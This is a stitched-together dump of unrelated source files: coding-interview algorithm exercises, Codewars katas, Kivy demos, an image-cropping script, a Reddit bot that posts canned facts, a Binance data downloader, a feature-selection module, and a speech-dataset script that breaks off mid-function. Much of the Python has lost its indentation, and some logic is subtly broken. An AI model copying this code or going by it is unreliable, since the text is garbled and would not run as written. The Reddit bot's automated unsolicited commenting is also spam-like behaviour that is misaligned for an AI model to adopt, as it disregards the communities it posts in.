reader = ArrayReader([4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30])
print(search_in_infinite_array(reader, 16))
print(search_in_infinite_array(reader, 11))
reader = ArrayReader([1, 3, 8, 10, 15])
print(search_in_infinite_array(reader, 15))
print(search_in_infinite_array(reader, 200))
```
#### File: Grokking-the-coding-interview/modified binary search/search in rotated array.py
```python
def search_in_rotated_array(arr, key):
if len(arr) == 0:
return -1
start, end = 0, len(arr) - 1
while start <= end:
mid = start + (end - start) // 2
if arr[mid] == key:
return mid
if arr[start] <= arr[mid]:
if key >= arr[start] and key < arr[mid]:
end = mid - 1
else:
start = mid + 1
else:
if key > arr[mid] and key <= arr[end]:
start = mid + 1
else:
end = mid - 1
return -1
print(search_in_rotated_array([10, 15, 1, 3, 8], 15))
print(search_in_rotated_array([4, 5, 7, 9, 10, -1, 2], 10))
# follow up: How do we search in a sorted and rotated array that also has duplicates?
print(search_in_rotated_array([3, 7, 3, 3, 3], 7))
# best: O(logN) worst:O(N) space:O(1)
def search_in_rotated_duplicate_array(arr, key):
if len(arr) == 0:
return -1
start, end = 0, len(arr) - 1
while start <= end:
mid = start + (end - start) // 2
if arr[mid] == key:
return mid
if arr[start] == arr[mid] and arr[end] == arr[mid]:
start += 1
end -= 1
if arr[start] <= arr[mid]:
if key >= arr[start] and key < arr[mid]:
end = mid - 1
else:
start = mid + 1
else:
if key > arr[mid] and key <= arr[end]:
start = mid + 1
else:
end = mid - 1
return -1
print(search_in_rotated_duplicate_array([3, 7, 3, 3, 3], 7))
```
#### File: Grokking-the-coding-interview/sliding window/intro.py
```python
def find_average_of_subarrays(subarray, size):
output = []
for i in range(len(subarray)-size+1):
average = sum(subarray[i: i+size])/size
output.append(average)
return output
subarray = [1, 3, 2, 6, -1, 4, 1, 8, 2]
size = 5
print(find_average_of_subarrays(subarray, size))
subarray = [1, 3, 2, 6, -1]
print(find_average_of_subarrays(subarray, size))
subarray = [1, 3, 2, 6]
print(find_average_of_subarrays(subarray, size))
# sliding window
# time complexity: O(N)
def find_average_of_subarrays_2(subarray, size):
output = []
result = sum(subarray[0:size])
output.append(result/size)
for i in range(len(subarray)-size):
result -= subarray[i]
result += subarray[i+size]
output.append(result/size)
return output
subarray = [1, 3, 2, 6, -1, 4, 1, 8, 2]
size = 5
print(find_average_of_subarrays_2(subarray, size))
subarray = [1, 3, 2, 6, -1]
print(find_average_of_subarrays_2(subarray, size))
# mark answer
def find_average_of_subarrays_3(subarray, size):
output = []
windowSum, windowStart = 0, 0
for windowEnd in range(len(subarray)):
windowSum += subarray[windowEnd]
if windowEnd >= size-1: # greater or equal to
output.append(windowSum/size)
windowSum -= subarray[windowStart]
windowStart += 1
return output
subarray = [1, 3, 2, 6, -1, 4, 1, 8, 2]
size = 5
print(find_average_of_subarrays_3(subarray, size))
subarray = [1, 3, 2, 6, -1]
print(find_average_of_subarrays_3(subarray, size))
```
#### File: Grokking-the-coding-interview/sliding window/longest_substring_with_ones_after_replacement.py
```python
def longest_substring_with_ones_after_k_replacement(arr, k):
max_one_repeat_times = 0
result = 0
window_start = 0
for window_end in range(len(arr)):
right_char = arr[window_end]
if right_char == 1:
max_one_repeat_times += 1
if window_end - window_start + 1 - max_one_repeat_times > k:
left_char = arr[window_start]
if left_char == 1:
max_one_repeat_times -= 1
window_start += 1
result = max(result, window_end - window_start + 1)
return result
print(longest_substring_with_ones_after_k_replacement([0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1], 2))
print(longest_substring_with_ones_after_k_replacement([0, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1], 3))
```
#### File: Grokking-the-coding-interview/sliding window/permutation in a string.py
```python
def permutation_in_a_string(str, pattern):
char_pattern = dict()
for char in pattern:
if char not in char_pattern:
char_pattern[char] = 0
char_pattern[char] += 1
window_start = 0
char_frequency = dict()
for window_end in range(len(str)):
right_char = str[window_end]
if right_char not in char_frequency:
char_frequency[right_char] = 0
char_frequency[right_char] += 1
if window_end - window_start + 1 > len(pattern):
left_char = str[window_start]
char_frequency[left_char] -= 1
if char_frequency[left_char] == 0:
del char_frequency[left_char]
window_start += 1
if char_frequency == char_pattern:
return True
return False
print(permutation_in_a_string("oidbcaf", "abc"))
print(permutation_in_a_string("odicf", "dc"))
print(permutation_in_a_string("bcdxabcdy", "bcdyabcdx"))
print(permutation_in_a_string("aaacb", "abc"))
def permutation_in_a_string_2(str, pattern):
window_start, matched = 0, 0
char_frequency = dict()
for char in pattern:
if char not in char_frequency:
char_frequency[char] = 0
char_frequency[char] += 1
for window_end in range(len(str)):
right_char = str[window_end]
if right_char in char_frequency:
char_frequency[right_char] -= 1
if char_frequency[right_char] == 0:
matched += 1
if matched == len(char_frequency):
return True
if window_end >= len(pattern) - 1:
left_char = str[window_start]
window_start += 1
if left_char in char_frequency:
if char_frequency[left_char] == 0:
matched -= 1
char_frequency[left_char] += 1
return False
print(permutation_in_a_string_2("oidbcaf", "abc"))
print(permutation_in_a_string_2("odicf", "dc"))
print(permutation_in_a_string_2("bcdxabcdy", "bcdyabcdx"))
print(permutation_in_a_string_2("aaacb", "abc"))
```
#### File: Grokking-the-coding-interview/subsets/permutations.py
```python
from collections import deque
def permutations(arr):
    num_length = len(arr)
    result = []
    permutations = deque()
    permutations.append([])
    for current_num in arr:
        n = len(permutations)
        for _ in range(n):
            old_permutation = permutations.popleft()
            for j in range(len(old_permutation) + 1):
                new_permutation = list(old_permutation)
                new_permutation.insert(j, current_num)
                if len(new_permutation) == num_length:
                    result.append(new_permutation)
                else:
                    permutations.append(new_permutation)
    return result
print(permutations([1, 3, 5]))
def recursive_permutation(arr):
result = []
generate_permutations_recursive(arr, 0, [], result)
return result
def generate_permutations_recursive(arr, index, current_permutation, result):
if index == len(arr):
result.append(current_permutation)
else:
for i in range(len(current_permutation) + 1):
new_permutation = list(current_permutation)
new_permutation.insert(i, arr[index])
generate_permutations_recursive(arr, index + 1, new_permutation, result)
print(recursive_permutation([1, 3, 5]))
```
#### File: Grokking-the-coding-interview/subsets/subsets with duplicates.py
```python
def find_subsets_with_duplicates(arr):
arr.sort()
subsets = []
subsets.append([])
start_index, end_index = 0, 0
for i in range(len(arr)):
start_index = 0
if i > 0 and arr[i] == arr[i - 1]:
start_index = end_index + 1
end_index = len(subsets) - 1
for j in range(start_index, end_index + 1):
subset = list(subsets[j])
subset.append(arr[i])
subsets.append(subset)
return subsets
print(find_subsets_with_duplicates([1, 3, 3]))
print(find_subsets_with_duplicates([1, 5, 5, 3, 3]))
```
#### File: Grokking-the-coding-interview/subsets/unique generalized abbreviations.py
```python
from collections import deque
class Abbrevations:
def __init__(self, str, start, count) -> None:
self.str = str
self.start = start
self.count = count
def unique_generalized_abbrevations(word):
result = []
queue = deque()
queue.append(Abbrevations(list(), 0, 0))
while queue:
ab_word = queue.popleft()
if ab_word.start == len(word):
if ab_word.count != 0:
ab_word.str.append(str(ab_word.count))
result.append(''.join(ab_word.str))
else:
queue.append(Abbrevations(list(ab_word.str), ab_word.start + 1, ab_word.count + 1))
if ab_word.count != 0:
ab_word.str.append(str(ab_word.count))
new_word = list(ab_word.str)
new_word.append(word[ab_word.start])
queue.append(Abbrevations(new_word, ab_word.start + 1, 0))
return result
def unique_generalized_abbrevations_2(word):
result = []
unique_generalized_abbrevations_recursive(word, 0, 0, [], result)
return result
def unique_generalized_abbrevations_recursive(word, start, count, current_str, result):
if start == len(word):
if count != 0:
current_str.append(str(count))
result.append(''.join(current_str))
else:
unique_generalized_abbrevations_recursive(word, start + 1, count + 1, list(current_str), result)
if count != 0:
current_str.append(str(count))
new_word = list(current_str)
new_word.append(word[start])
unique_generalized_abbrevations_recursive(word, start + 1, 0, new_word, result)
print(unique_generalized_abbrevations("BAT"))
print(unique_generalized_abbrevations_2("BAT"))
```
#### File: Grokking-the-coding-interview/top k elements/kth largest number in a stream.py
```python
from heapq import *
class KthlargestStream:
    def __init__(self, nums, k) -> None:
        self.minheap = []  # per-instance min-heap holding the k largest numbers seen so far
        self.k = k
        for num in nums:
            self.add(num)
    def add(self, num):
        heappush(self.minheap, num)
        if len(self.minheap) > self.k:
            heappop(self.minheap)
        return self.minheap[0]
kthlargestStream = KthlargestStream([3, 1, 5, 12, 2, 11], 4)
print(kthlargestStream.add(6))
print(kthlargestStream.add(13))
print(kthlargestStream.add(4))
```
#### File: Grokking-the-coding-interview/top k elements/rearrange string.py
```python
from heapq import *
def rearrange_string(input_str):
maxheap = []
hashmap = dict()
for char in input_str:
hashmap[char] = hashmap.get(char, 0) + 1
for char, frequency in hashmap.items():
heappush(maxheap, (-frequency, char))
result = []
previous_char, previous_frequency = None, 0
while maxheap:
frequency, char = heappop(maxheap)
if previous_char and -previous_frequency > 0:
heappush(maxheap, (previous_frequency, previous_char))
result.append(char)
previous_char = char
previous_frequency = frequency + 1
if len(result) == len(input_str):
return "".join(result)
else:
return ""
print(rearrange_string("aappp"))
print(rearrange_string("Programming"))
print(rearrange_string("aapa"))
```
#### File: Grokking-the-coding-interview/top k elements/sum of elements.py
```python
# Given an array, find the sum of all numbers between the K1’th and K2’th smallest elements of that array.
# Example:
# Input: [1, 3, 12, 5, 15, 11], and K1=3, K2=6
# Output: 23
# Explanation: The 3rd smallest number is 5 and 6th smallest number 15. The sum of numbers coming
# between 5 and 15 is 23 (11+12).
# O(N * logN) space: O(N)
from heapq import *
def sum_of_elements(nums, k1, k2):
minheap = []
for num in nums:
heappush(minheap, num)
for _ in range(k1):
heappop(minheap)
numsum = 0
for _ in range(k2 - k1 - 1):
numsum += heappop(minheap)
return numsum
print(sum_of_elements([1, 3, 12, 5, 15, 11], 3, 6))
print(sum_of_elements([3, 5, 8, 7], 1, 4))
# to reduce the time complexity
# O(N * logk2) space:O(k2)
def sum_of_elements_2(nums, k1, k2):
maxheap = []
for i in range(len(nums)):
if i < k2 - 1:
heappush(maxheap, -nums[i])
elif nums[i] < -maxheap[0]:
heappop(maxheap)
heappush(maxheap, -nums[i])
numsum = 0
for _ in range(k2 - k1 - 1):
numsum += -heappop(maxheap)
return numsum
print(sum_of_elements_2([1, 3, 12, 5, 15, 11], 3, 6))
print(sum_of_elements_2([3, 5, 8, 7], 1, 4))
```
#### File: Grokking-the-coding-interview/top k elements/top k frequent numbers.py
```python
from heapq import *
class WordFrequency:
def __init__(self, word, frequency) -> None:
self.word = word
self.frequency = frequency
def __lt__(self, other):
return self.frequency < other.frequency
def top_k_frequent_elements(nums, k):
hashmap = dict()
for num in nums:
if num not in hashmap:
hashmap[num] = 1
else:
hashmap[num] += 1
minheap = []
for key, val in hashmap.items():
heappush(minheap, WordFrequency(key, val))
if len(minheap) > k:
heappop(minheap)
result = []
while minheap:
result.append(heappop(minheap).word)
return result
print(top_k_frequent_elements([1, 3, 5, 12, 11, 12, 11], 2))
print(top_k_frequent_elements([5, 12, 11, 3, 11], 2))
``` |
{
"source": "JoanYu/PANDA-Toolkit",
"score": 2
} |
#### File: JoanYu/PANDA-Toolkit/cut_image.py
```python
import __future__
import cv2
import random
import os
import numpy as np
name_length = 6
pwd = os.getcwd()
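# Overview (descriptive comment): the script crops fixed-size regions (e.g. 256x256) roughly centred,
# with a small random offset, on every annotated object in the PANDA images, keeps only the boxes
# that fall inside each crop, and writes one image plus one annotation file per crop using
# zero-padded sequential file names.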
def get_data(region_size, start_number):
path_images = "/Users/xduyzy/Downloads/PANDA_IMAGE/image_train/"
path_labels = 'image_train/image_annos/'
save_image_path = 'result/images/1/'
save_label_path = 'result/annos/1/'
for image_name in os.listdir(path_images):
label_name = image_name[:-4] + '.txt'
image_path = os.path.join(path_images, image_name)
label_path = os.path.join(path_labels, label_name)
img = cv2.imread(image_path)
label = open(label_path,"r")
lines = label.readlines()
line_record = []
for i in range(len(lines)):
if i in line_record:
continue
line_ = lines[i].strip('\r\n')
strline_ = (((line_.replace('(', '')).replace(')', '')).replace('(', '')).replace(')', '')
strline = strline_.split(",")
x1 = float(strline[0])
y1 = float(strline[1])
width = float(strline[2])
height = float(strline[3])
confidence = int(float(strline[4]))
if confidence != 1:
continue
cate = int(float(strline[5]))
# if cate==0 or cate==11:
# continue
center_x = width/2+x1
center_y = height/2+y1
if width<=3:
continue
if height<=3:
continue
rand_int = float(random.uniform(-region_size[0]//4, region_size[1]//4))
# + rand_int
left = int(center_x - region_size[1]//2 + rand_int)
right = int(center_x + region_size[1]//2 + rand_int)
upper = int(center_y - region_size[0]//2 + rand_int)
bottom = int(center_y + region_size[0]//2 + rand_int)
if left<=0:
left = 1
right = region_size[1]
if right >= img.shape[1]:
left = img.shape[1]-region_size[1]
right = img.shape[1]
if upper<=0:
upper = 1
bottom = region_size[0]
if bottom >= img.shape[0]:
upper = img.shape[0]-region_size[0]
bottom = img.shape[0]
img_region = img[upper:bottom,left:right,:]
label_list = []
for j in range(len(lines)):
line_1 = lines[j].strip('\r\n')
strline_1 = (((line_1.replace('(', '')).replace(')', '')).replace('(', '')).replace(')', '')
strline1 = strline_1.split(",")
x11 = float(strline1[0])
y11 = float(strline1[1])
w = float(strline1[2])
h = float(strline1[3])
confidence1 = int(float(strline1[4]))
if confidence1 != 1:
continue
c = int(float(strline1[5]))
truincation = float(strline1[6])
occlusion = float(strline1[7])
# if c == 0 or c == 11:
# continue
c_x = w/2+x11
c_y = h/2+y11
if w <= 3:
continue
if h <= 3:
continue
tt = 1
if c_x>=left+w*0.2 and c_x<=right-w*0.2 and c_y>=upper+h*0.2 and c_y<=bottom-h*0.2:
b_left = c_x - w/2 - left
b_upper = c_y - h/2 - upper
b_right = c_x + w/2 - left
b_bottom = c_y + h/2 - upper
if b_left <= 0:
b_left = 1
tt = 0
if b_upper <= 0:
b_upper = 1
tt = 0
if b_right >= region_size[1]:
b_right = region_size[1]
tt = 0
if b_bottom >= region_size[0]:
b_bottom = region_size[0]
tt = 0
if tt==1:
line_record.append(j)
b_width = b_right - b_left
b_height = b_bottom - b_upper
label_list.append((int(b_left), int(b_upper), int(b_width), int(b_height), int(confidence1), int(c), truincation, occlusion))
new_name_str = (name_length - len(str(start_number))) * '0' + str(start_number)
with open(save_label_path+ new_name_str+".txt","w") as f:
for m in range(len(label_list)):
f.write(str(label_list[m][0])+","+str(label_list[m][1])+","+str(label_list[m][2])+","+str(label_list[m][3])+","+str(label_list[m][4])+ "," + str(label_list[m][5])+"," + str(label_list[m][6])+"," + str(label_list[m][7]) + '\r\n')
f.close()
cv2.imwrite(save_image_path + new_name_str + ".jpg", img_region)
start_number = start_number + 1
print(start_number)
return start_number
if __name__ == "__main__":
order = get_data((256, 256), 0)
# order400 = get_data(400, order)
# order600 = get_data(600, order400)
# print order600,order600-order
``` |
{
"source": "joanzhu728/Codewar",
"score": 3
} |
#### File: joanzhu728/Codewar/12_ExtractDomain.py
```python
def domain_name(url):
i = url.find("www.")
if i != -1:
url_new = url[i+4:]
else:
i = url.find("://")
if i != -1:
url_new = url[i+3:]
else:
url_new = url[0:]
domain = url_new.split(".")
return domain[0]
# return url.split("//")[-1].split("www.")[-1].split(".")[0]
import codewars_test as test
test.assert_equals(domain_name("http://google.com"), "google")
test.assert_equals(domain_name("http://google.co.jp"), "google")
test.assert_equals(domain_name("www.xakep.ru"), "xakep")
test.assert_equals(domain_name("https://youtube.com"), "youtube")
```
#### File: joanzhu728/Codewar/3_FindTheParityOutlier.py
```python
import codewars_test as test
def find_outlier(integers):
count_odd = 0
count_eve = 0
outlier = 0
if integers[0] % 2 == 0:
count_eve += 1
else:
count_odd += 1
if integers[1] % 2 == 0:
count_eve += 1
else:
count_odd += 1
if integers[2] % 2 == 0:
count_eve += 1
else:
count_odd += 1
if count_eve >= 2:
for n in integers:
if n % 2 != 0:
outlier = n
elif count_odd >= 2:
for n in integers:
if n % 2 == 0:
outlier = n
return outlier
# odds = [x for x in integers if x%2!=0]
# evens= [x for x in integers if x%2==0]
# return odds[0] if len(odds)<len(evens) else evens[0]
test.assert_equals(find_outlier([2, 4, 6, 8, 10, 3]), 3)
test.assert_equals(find_outlier([2, 4, 0, 100, 4, 11, 2602, 36]), 11)
test.assert_equals(find_outlier([160, 3, 1719, 19, 11, 13, -21]), 160)
```
#### File: joanzhu728/Codewar/4_PersistanceBugger.py
```python
import codewars_test as test
def persistence(n):
times = 0
if len(str(n)) == 1:
return times
else:
while len(str(n)) > 1:
multiple = 1
for x in str(n):
multiple *= int(x)
times += 1
n = multiple
return times
# import operator
# def persistence(n):
# i = 0
# while n>=10:
# n=reduce(operator.mul,[int(x) for x in str(n)],1)
# i+=1
# return i
test.it("Basic tests")
test.assert_equals(persistence(39), 3)
test.assert_equals(persistence(4), 0)
test.assert_equals(persistence(25), 2)
test.assert_equals(persistence(999), 4)
```
#### File: joanzhu728/Codewar/6_BitCounting.py
```python
def count_bits(n):
count = 0
bi = str(bin(n))
bi = bi[2:]
for x in bi:
if x == "1":
count += 1
return count
# return bin(n).count("1")
import codewars_test as test
@test.describe("Fixed Tests")
def fixed_tests():
@test.it("Basic Tests")
def basic_tests():
test.assert_equals(count_bits(0), 0)
test.assert_equals(count_bits(4), 1)
test.assert_equals(count_bits(7), 3)
test.assert_equals(count_bits(9), 2)
test.assert_equals(count_bits(10), 2)
```
#### File: tests/fixtures/multiple_groups.py
```python
import codewars_test as test
@test.describe("group 1")
def group_1():
@test.it("test 1")
def test_1():
test.assert_equals(1, 2)
@test.describe("group 2")
def group_2():
@test.it("test 1")
def test_1():
test.assert_equals(1, 2)
```
#### File: tests/fixtures/timeout_failing.py
```python
import codewars_test as test
@test.describe("group 1")
def group_1():
@test.timeout(0.01)
def test_1():
x = 0
while x < 10 ** 9:
x += 1
test.pass_()
``` |
{
"source": "joao0710/primeiro-repo",
"score": 2
} |
#### File: Kivy/gui/crud.py
```python
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
class Principal(BoxLayout):
pass
class Crud(App):
def build(self):
return Principal()
Crud().run()
```
#### File: gui/layouts/grid.py
```python
from kivy.app import App
from kivy.uix.gridlayout import GridLayout
class TelaApp(GridLayout):
pass
class Grid(App):
def build(self):
return TelaApp()
Grid().run()
```
#### File: Kivy/gui/teste.py
```python
from kivy.app import App
from kivy.properties import StringProperty, NumericProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
from kivy.uix.widget import Widget
class Principal(BoxLayout):
texto_principal = StringProperty('Eu sou uma label')
tamanho_texto_principal = NumericProperty(20)
def teste(self):
self.texto_principal = 'Fui clicado'
self.tamanho_texto_principal = 50
class Secundario(Widget):
pass
class Teste(App):
def build(self):
return Principal()
Teste().run()
```
#### File: pythoncollections/generators/meu_generator.py
```python
def eleva_dois(max=0):
n = 0
while n < max:
yield 2 ** n
n += 1
for i in eleva_dois(5):
print(i)
``` |
{
"source": "joao0710/tecnosul",
"score": 2
} |
#### File: base/tests/test_home.py
```python
import pytest
from django.urls import reverse
from sitetecnosul.django_assertions import assert_contains
@pytest.fixture
def resp(client):
resp = client.get(reverse('base:home'))
return resp
def test_status_code(resp):
assert resp.status_code == 200
def test_title(resp):
assert_contains(resp, '<title>Tecnosul</title>')
``` |
{
"source": "Joao16am/si",
"score": 3
} |
#### File: si/util/Feature_selection.py
```python
import numpy as np
import warnings
from copy import copy
from scipy import stats
from si.data import Dataset
class VarianceThreshold:
def __init__(self, threshold=0):
if threshold < 0:
warnings.warn('The threshold must be a non-negative value.')
threshold = 0
self.threshold = threshold
def fit(self, dataset):
# Gives variance of all X data
X = dataset.X
self._var = np.var(X, axis=0)
def transform(self, dataset, inline=False):
X, X_names = copy(dataset.X), copy(dataset._xnames)
cond = self._var > self.threshold
X_trans = X[:, cond]
idxs = [i for i in range(dataset.getNumFeatures()) if cond[i]]
x_names = [X_names[i] for i in idxs]
if inline:
dataset.X = X_trans
dataset._xnames = x_names
return dataset
else:
return Dataset(X_trans, copy(dataset.y), x_names, copy(dataset._yname))
def fit_transform(self, dataset, inline=False):
self.fit(dataset)
return self.transform(dataset, inline=inline)
class SelectKBest:
    def __init__(self, k: int, score_funcs):
        if score_funcs in (f_classification, f_regression):
            self._func = score_funcs
        else:
            warnings.warn('Invalid score function, falling back to f_classification.')
            self._func = f_classification
        if k <= 0:
            warnings.warn('Invalid feature number, K must be greater than 0.')
        self.k = k
def fit(self, dataset):
self.F, self.P = self._func(dataset)
def transform(self, dataset, inline=False):
X, X_names = copy(dataset.X), copy(dataset._xnames)
feat_select = sorted(np.argsort(self.F)[-self.k:])
x = X[:, feat_select]
x_names = [X_names[feat] for feat in feat_select]
if inline:
dataset.X = x
dataset._xnames = x_names
return dataset
else:
return Dataset(x, copy(dataset.y), x_names, copy(dataset._yname))
def fit_transform(self, dataset, inline=False):
self.fit(dataset)
return self.transform(dataset, inline=inline)
def f_classification(dataset):
X = dataset.X
y = dataset.y
args = [X[y == a, :] for a in np.unique(y)]
F, p = stats.f_oneway(*args)
return F, p
def f_regression(dataset):
from scipy.stats import f
X = dataset.X
y = dataset.y
correlation_coeficient = np.array([stats.pearsonr(X[:, i], y)[0] for i in range(X.shape[1])])
deg_of_freedom = y.size - 2
corr_coef_squared = correlation_coeficient ** 2
F = corr_coef_squared / (1 - corr_coef_squared) * deg_of_freedom
p = f.sf(F, 1, deg_of_freedom)
return F, p
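# Example usage (a minimal, hedged sketch; it assumes the si.data.Dataset constructor takes
# (X, y, feature_names, label_name), as in the transform() methods above -- adjust if it differs):
# if __name__ == '__main__':
#     X = np.array([[0, 2, 0, 3], [0, 1, 4, 3], [0, 1, 1, 3]])
#     y = np.array([0, 1, 0])
#     ds = Dataset(X, y, ['f1', 'f2', 'f3', 'f4'], 'label')
#     vt = VarianceThreshold(threshold=0)
#     print(vt.fit_transform(ds).X)      # drops the constant columns f1 and f4
#     skb = SelectKBest(k=2, score_funcs=f_classification)
#     print(skb.fit_transform(ds).X)     # keeps the two highest-scoring features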
``` |
{
"source": "joao29a/reddit-bots",
"score": 3
} |
#### File: reddit-bots/facts/facts.py
```python
import praw
import time
import sys
import random
#description of your bot
r = praw.Reddit(user_agent='')
#username and password
r.login('', '')
subreddits = ['funny', 'all', 'gifs', 'videos', '4chan', 'AdviceAnimals',\
'cringe', 'gaming', 'movies', 'soccer', 'crossfit', 'loseit']
f = open('ids', 'r')
replied = f.read().split('\n')
if len(replied) == 1:
replied = []
else:
replied.pop()
f.close()
def get_facts(filename):
message_facts = []
f = open(filename, 'r')
for line in f:
message = line.replace('\n','')
message_facts.append(message)
f.close()
return message_facts
random_facts = get_facts('random.txt')
soccer_facts = get_facts('soccer.txt')
games_facts = get_facts('games.txt')
fitness_facts = get_facts('fitness.txt')
movies_facts = get_facts('movies.txt')
games_list = ['gaming', 'games', 'game', 'videogame', 'starcraft']
soccer_list = ['soccer']
fitness_list = ['crossfit', 'gym', 'loseit']
movies_list = ['movie', 'movies', 'cinema']
def get_phrase(subreddit_name):
if (any(word in subreddit_name.lower() for word in soccer_list)):
return random.choice(soccer_facts)
elif (any(word in subreddit_name.lower() for word in games_list)):
return random.choice(games_facts)
elif (any(word in subreddit_name.lower() for word in fitness_list)):
return random.choice(fitness_facts)
elif (any(word in subreddit_name.lower() for word in movies_list)):
return random.choice(movies_facts)
else:
return random.choice(random_facts)
unreplied_threads = {}
replied = []
delay = 120
max_time = 3600*1
while True:
try:
subreddit = r.get_subreddit(random.choice(subreddits))
submission = subreddit.get_random_submission()
time_elapsed = int(abs(time.time() - submission.created_utc))
if submission.id not in replied and submission.id not in unreplied_threads and time_elapsed < max_time:
phrase = get_phrase(subreddit.display_name)
message = 'Have some interesting fact to lighten up your thread - \"*' + phrase + '*\"'
unreplied_threads[submission.id] = [submission, message]
ids = []
for value in unreplied_threads.values():
try:
print value[0]
value[0].add_comment(value[1])
ids.append(value[0].id)
except Exception as error:
print error
for i in ids:
del unreplied_threads[i]
f = open('ids', 'a')
f.write(i + '\n')
f.close()
replied.append(i)
time.sleep(delay)
except Exception as error:
print error
time.sleep(delay)
``` |
{
"source": "joao-aguilera-c/Binance-Algo-Trading-Bot",
"score": 2
} |
#### File: joao-aguilera-c/Binance-Algo-Trading-Bot/Get_Symbol_Info.py
```python
import datetime
import os
import pandas as pd
from binance.client import Client
import main as ws
from strategies import strutcnow
def get_file_names(dir): # 1.Get file names from directory
file_list = os.listdir(dir)
for index, item in enumerate(file_list):
file_list[index] = item[:-4]
return file_list
def TsToStrgCsvFormat(time):
t = datetime.datetime.utcfromtimestamp(time / 1000.0)
return t.strftime('%Y.%m.%d %H:%M:%S')
async def get_symbol_info(client, semanal_symbol_list, directory):
binance_client = client
# print("%s - Programa iniciado" % strutcnow())
# 2.To rename files
files = get_file_names(directory)
# print(files)
minutes_15 = pd.to_timedelta(15, unit='m')
days_60 = pd.to_timedelta(62, unit='D')
time_now = datetime.datetime.utcnow() - minutes_15
for week_symbols in semanal_symbol_list:
# print('%s - mining new values from %s' % (strutcnow(), s))
df = pd.read_csv('%s/%s.csv' % (directory, week_symbols), header=None)
last_rec_date = datetime.datetime.strptime(df[0].iloc[-1], '%Y.%m.%d %H:%M:%S') + minutes_15
# print('%s < %s' % (last_rec_date, time_now))
if last_rec_date < time_now:
"""print('%s - last mined candle was at: %s. Mining more.' % (strutcnow(),
datetime.datetime.strptime(
df[0].iloc[-1],
'%Y.%m.%d %H:%M:%S')))"""
candles_dataset = await binance_client.get_historical_klines(week_symbols,
Client.KLINE_INTERVAL_15MINUTE,
last_rec_date.strftime(
"%m/%d/%Y %H:%M:%S"),
time_now.strftime(
"%m/%d/%Y %H:%M:%S"))
if candles_dataset != []:
df = pd.DataFrame(candles_dataset)
df = df.iloc[:, :-7]
df[0] = [TsToStrgCsvFormat(time) for time in df[0]]
if ws.get_last_csv_candle_time(directory, week_symbols) != df[0].iloc[-1]:
print('%s - %s -> update from: %s to time: %s' %
(strutcnow(),
week_symbols,
ws.get_last_csv_candle_time(directory, week_symbols),
df[0].iloc[-1]))
df.to_csv('%s/%s.csv' % (directory, week_symbols), mode='a', header=False, index=False)
else:
print("{} - Algo errado com o {}, binance não foi capaz de enviar dados.".format(
strutcnow(), week_symbols))
else:
            print('%s - %s already up to date' % (strutcnow(), week_symbols))
if __name__ == "__main__":
    # get_symbol_info is a coroutine, so it has to be driven by an event loop; swap client=None for a
    # real async Binance client before running it against the exchange.
    import asyncio
    asyncio.run(get_symbol_info(client=None, semanal_symbol_list=['BTCUSD', 'ETHUSD'], directory=r'/Symbols'))
```
#### File: joao-aguilera-c/Binance-Algo-Trading-Bot/send_email.py
```python
import smtplib
import ssl
def send_email(subject, matter):
port = 465 # For SSL
smtp_server = "smtp.gmail.com"
sender_email = "<EMAIL>" # Enter your address
receiver_email = "<EMAIL>" # Enter receiver address
password = "********"
message = 'Subject: {}\n\n{}'.format(subject, matter)
context = ssl.create_default_context()
with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:
server.login(sender_email, password)
server.sendmail(sender_email, receiver_email, message)
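# Example call (hedged sketch; the credentials above are placeholders and must be filled in first):
# send_email("Trading bot alert", "BTCUSDT: buy signal triggered")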
``` |
{
"source": "joaoalvarenga/TensorFlowASR",
"score": 2
} |
#### File: scripts/.ipynb_checkpoints/create_portuguese_trans-checkpoint.py
```python
import argparse
import os
import glob
import random
import re
import librosa
import pandas as pd
from tqdm import tqdm
SPACES_PATTERN = re.compile('[\t\r\n\s0-9]+')
PUNCTUATION = re.compile('[!"#$%&\'()*+,-./:;<=>?@\]\[\\^_`{|}~]')
def get_duration(filename):
audio, sr = librosa.load(filename)
return librosa.get_duration(audio, sr)
def clean_text(transcript):
return PUNCTUATION.sub('', transcript)
def process_common_voice(path, tsv_file):
df = pd.read_csv(os.path.join(path, tsv_file), sep='\t')
output = []
for i, d in df.iterrows():
clip_path = os.path.join(path, os.path.join('clips', d['path']))
transcript = clean_text(d['sentence'].lower()).strip()
if len(SPACES_PATTERN.sub('', transcript)) == 0:
print(f'Skipping CV {clip_path} from {tsv_file}')
continue
output.append((f'{clip_path}.wav', transcript))
return output
def process_alcaim(alcaim_path, random_seed, max_test_people=20, max_test_utterances=200, compute_duration=False):
print('Processing alcaim')
folders = [os.path.join(alcaim_path, f.path) for f in os.scandir(alcaim_path) if f.is_dir()]
_random = random.Random(random_seed)
_random.shuffle(folders)
test_folders = folders[:max_test_people]
train, test = [], []
train_duration = 0
test_duration = 0
for folder in tqdm(folders, total=len(folders)):
is_eval_folder = folder in test_folders
test_utterances = []
for transcript_path in tqdm(glob.glob(f'{folder}/*.txt')):
with open(transcript_path) as f:
transcript = f.read().lower().strip()
audio_filename = transcript_path.replace('.txt', '.wav')
duration = 0
if compute_duration:
duration = get_duration(audio_filename)
if is_eval_folder and len(test_utterances) < max_test_utterances:
test_utterances.append((audio_filename, transcript))
test_duration += duration
continue
train.append((audio_filename, transcript))
            train_duration += duration
test += test_utterances
return train, test, train_duration, test_duration
def process_generic(generic_path, compute_duration=False):
print('Processing generic')
folders = [os.path.join(generic_path, f.path) for f in os.scandir(generic_path) if f.is_dir()]
data = []
duration = 0
for folder in tqdm(folders, total=len(folders)):
for transcript_path in glob.glob(f'{folder}/*.txt'):
audio_filename = transcript_path.replace('.txt', '.wav')
with open(transcript_path) as f:
transcript = f.read().lower().strip()
data.append((audio_filename, transcript))
if compute_duration:
duration += get_duration(audio_filename)
return data, duration
def process_sid(sid_path, compute_duration=False):
print('Processing SID')
folders = [os.path.join(sid_path, f.path) for f in os.scandir(sid_path) if f.is_dir()]
data = []
duration = 0
for folder in tqdm(folders, total=len(folders)):
prompts = {}
with open(f'{folder}/prompts.txt') as f:
for l in f:
parts = l.strip().split('=')
idx = int(parts[0])
transcript = clean_text(' '.join(parts[1:]).lower())
if len(SPACES_PATTERN.sub('', transcript)) == 0:
continue
prompts[idx] = transcript
files = sorted(glob.glob(f'{folder}/*.wav'))
